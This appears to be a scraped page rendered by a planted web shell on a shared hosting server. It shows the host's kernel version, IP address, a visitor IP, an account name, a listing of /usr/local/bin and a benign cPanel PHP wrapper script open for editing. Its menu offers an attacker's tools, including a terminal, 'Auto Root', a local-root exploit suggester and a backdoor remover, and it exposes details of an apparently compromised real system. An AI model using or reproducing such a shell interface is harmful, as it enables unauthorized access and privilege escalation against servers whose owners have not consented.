Linux server218.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 198.54.116.163 & Your IP : 216.73.216.49
Domains :
Cant Read [ /etc/named.conf ]
User : juloluaq
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
ea-php70
5.01
MB
-rwxr-xr-x
2025-08-15 03:51
ea-php71
5.27
MB
-rwxr-xr-x
2025-08-15 04:21
ea-php72
5.56
MB
-rwxr-xr-x
2025-08-15 04:32
ea-php73
3.93
MB
-rwxr-xr-x
2025-08-15 04:53
ea-php74
6.09
MB
-rwxr-xr-x
2025-08-15 05:05
ea-php81
8.12
MB
-rwxr-xr-x
2025-10-22 16:02
lsphp
937
B
-rwxr-xr-x
2025-04-03 11:08
php
933
B
-rwxr-xr-x
2025-04-03 11:08
Save
Rename
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - php-lsapi Copyright 2018 cPanel, L.L.C. # All rights Reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited package ea_php_cli::lsapi; BEGIN { delete @ENV{qw(PERL5LIB PERLLIB PERL5OPT PERL5DB PERL5SHELL PERL_DEBUG_MSTATS PERL_DESTRUCT_LEVEL)}; # Paranoid much? unshift @INC, '/var/cpanel/ea4'; # avoid slow use lib } use strict; use warnings; use ea_php_cli (); my $bin = "lsphp"; run(@ARGV) unless caller(); sub run { return ea_php_cli::run( $bin, @_ ); # faster than unshift @_, "php-cgi"; goto &ea_php_cli::run; ? } 1;